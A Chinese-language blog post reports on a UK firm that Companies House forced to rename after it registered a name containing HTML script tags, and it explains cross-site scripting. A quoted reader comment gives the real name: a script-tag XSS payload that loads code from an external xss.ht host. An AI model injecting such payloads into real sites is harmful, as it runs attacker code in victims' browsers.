英国名为””>的技术咨询公司被强迫改名
majer @ 2020.11.11 , 11:49 下午英国有位软件工程师打算离职创业,因为他承接的业务是为其他企业或个人提供技术咨询,所以希望为自己的注册公司想出一个“有趣好玩的名字”,看起来就很“技术”很“咨询”,足够醒目,与众不同。
思来想去,他最后就选用了下面这个:
"">
就是那个,没有打错。
不幸的是,英国公司的正式注册机构(被称为“公司大厦”)并不太同意他的看法——认为这个古怪的名称有趣或好玩,反而认为它非常地不妥。
据英国《卫报》报道,英国管理机构“在该公司迟迟未意识到其自选名可能会构成安全隐患后,已发函迫使该公司更改注册名。”
从此以后,该名软件工程师的咨询业务将合法地被称为“THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD”,亦即“那家名字曾包含html脚本标签的公司”。
略伤感的软件工程师现在承认,他并没有意识到英国的官方管理机构还在用老旧的系统——实际上很容易因他选用的符号式名称而受到所谓的“跨站点脚本XSS”攻击——一种极为简单的技术,允许攻击者从一个网站上迫使另一个网站运行恶意代码。
https://idle.slashdot.org/story/20/11/08/2334254/uk-agency-demands-company-stop-using-name-which-includes-an-html-closing-tag
什么是XSS攻击呢?
cross-site scripting,缩写成XSS。有人或许要问缩写不是css吗?
因为CSS已经是更为重要的级联样式表(装饰HTML外观的语言)的缩写啦。
跨站点脚本攻击是一种Web应用程序的攻击,攻击者尝试注入恶意脚本代码到受信任的网站上执行恶意操作。
具体说本文,英国的企业注册管理局担心,有人选用的企业注册名称本身就是一段代码(一般是JavaScript代码),当把代码(当成名称)输入到连接数据库的管理网页时,就会执行某个功能,向某个服务器传回什么敏感数据。
当然,按道理像是"">这种应该是没有威胁的,但是所谓道高一尺魔高一丈,如果伪装得特别精巧的话,管理局的程序员也识别不出来。既然如此,还不如禁用这些特殊的字符。
*来自评论区:
更正下,他们的公司名字实际上应该是(全角转半角)
”><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD.
大家抄新闻都抄错了 233
PREV : 三位学者刚刚摘下了当代密码学的王冠
NEXT : 称自己是炼金术士的骗子如何成为欧洲瓷器之父